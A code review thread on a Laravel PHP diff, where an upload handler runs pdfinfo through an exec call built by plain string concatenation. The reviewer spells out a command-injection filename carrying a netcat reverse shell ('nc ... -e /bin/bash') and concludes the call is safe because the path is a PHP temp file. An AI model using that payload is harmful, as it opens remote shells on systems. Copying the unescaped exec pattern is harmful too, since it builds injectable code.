app/Http/Controllers/PrintController.php

```diff
@@ -3,16 +3,51 @@
 namespace App\Http\Controllers;
 
 use Illuminate\Http\Request;
+use Illuminate\Support\Facades\Auth;
+use Illuminate\Support\Facades\Log;
+use Illuminate\Support\Facades\Storage;
 use Illuminate\Support\Facades\Validator;
 use App\User;
 use App\PrintAccount;
+use App\PrintJob;
 
 class PrintController extends Controller
 {
     public function index() {
         return view('print.app');
     }
 
+    public function print(Request $request) {
+        $validator = Validator::make($request->all(), [
+            'file_to_upload' => 'required|file|mimes:pdf|max:120000',
+            'number_of_copies' => 'required|integer|min:1'
+        ]);
+        $validator->validate();
+        
+        $print_account = Auth::user()->printAccount;
+        $two_sided = $request->has('two_sided');
+        $file = $request->file_to_upload;
+        $pages = exec("pdfinfo " . $file->getPathName() . " | grep '^Pages' | awk '{print $2}' 2>&1");
```

Comment:
This `exec` call seemed a bit nasty. I've double-checket to make sure that the user can not upload a file with name something like `mypdf;nc 192.168.100.113 4444 –e /bin/bash`.
Which then would be evaluated to `pdfinfo mypdf;nc 192.168.100.113 4444 –e /bin/bash | grep '^Pages' | awk '{print $2}' 2>&1` or something. Apparently the `$file->getPathName()` resulted in `/tmp/phpM4qTTJ`, so no worries.

---
All in all, I found no way to take control over the `exec` call, seems fine this time.

Reply:
Thanks for having a look at this.